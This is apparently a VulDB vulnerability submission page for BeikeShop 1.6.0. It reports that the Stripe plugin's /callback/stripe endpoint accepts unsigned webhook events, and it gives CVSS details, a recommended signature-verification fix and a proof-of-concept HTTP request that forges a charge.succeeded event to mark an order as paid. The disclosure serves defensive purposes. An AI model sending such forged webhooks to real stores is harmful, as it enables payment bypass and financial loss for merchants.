Soumettre #831466: BeikeShop 1.6.0 Design/Logic Flawinformation

TitreBeikeShop 1.6.0 Design/Logic Flaw
Description1. TITLE BeikeShop Stripe Plugin Missing Webhook Signature Verification Leads to Payment Bypass 2. PRODUCT BeikeShop 3. VENDOR BeikeShop / Guangda 4. VERSION <= 1.6.0 5. CWE CWE-347: Improper Verification of Cryptographic Signature 6. CVSS 3.1 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) 7. CATEGORY Web Application / Payment Gateway 8. SUMMARY The Stripe payment plugin in BeikeShop does not verify webhook signatures on the `/callback/stripe` endpoint. A remote unauthenticated attacker can forge Stripe webhook events and transition arbitrary orders into the paid state without completing a legitimate payment. 9. VULNERABLE CODE File: `plugins/Stripe/Controllers/StripeController.php` The `callback()` method reads attacker-controlled JSON input from `$request->all()` and directly processes `charge.succeeded` events without calling `\Stripe\Webhook::constructEvent()` to verify the `Stripe-Signature` header. 10. PROOF OF CONCEPT ```http POST /callback/stripe HTTP/1.1 Host: TARGET Content-Type: application/json { "type":"charge.succeeded", "data":{ "object":{ "metadata":{ "order_number":"KNOWN-ORDER-NUMBER" } } } } ``` Response: ```json {"status":"success","message":"Capture Successfully"} ``` Result: `orders.status` changes from `unpaid` to `paid`. 11. IMPACT * Unauthorized order state manipulation * Payment bypass * Inventory deduction for unpaid orders * Integrity impact on order and sales data * Potential financial loss 12. SOLUTION Implement Stripe webhook signature verification before processing webhook events: ```php $payload = $request->getContent(); $sigHeader = $request->header('Stripe-Signature'); $secret = plugin_setting('stripe.webhook_secret'); $event = \Stripe\Webhook::constructEvent( $payload, $sigHeader, $secret ); ``` Reject webhook requests when signature verification fails. 13. AUTHENTICATION None required 14. USER INTERACTION None required
La source⚠️ https://github.com/nuiifornet/BeikeShop-Vulnerability/blob/main/README.md
Utilisateur
 Fklov (UID 98102)
Soumission16/05/2026 11:06 (il y a 23 jours)
Modérer07/06/2026 09:32 (22 days later)
StatutAccepté
Entrée VulDB369082 [Chengdu Everbrite Network Technology BeikeShop jusqu’à 1.6.0.22 Stripe Plugin StripeController.php callback Demande élévation de privilèges]
Points20

PrécédentAperçuSuivant

Want to know what is going to be exploited?

We predict KEV entries!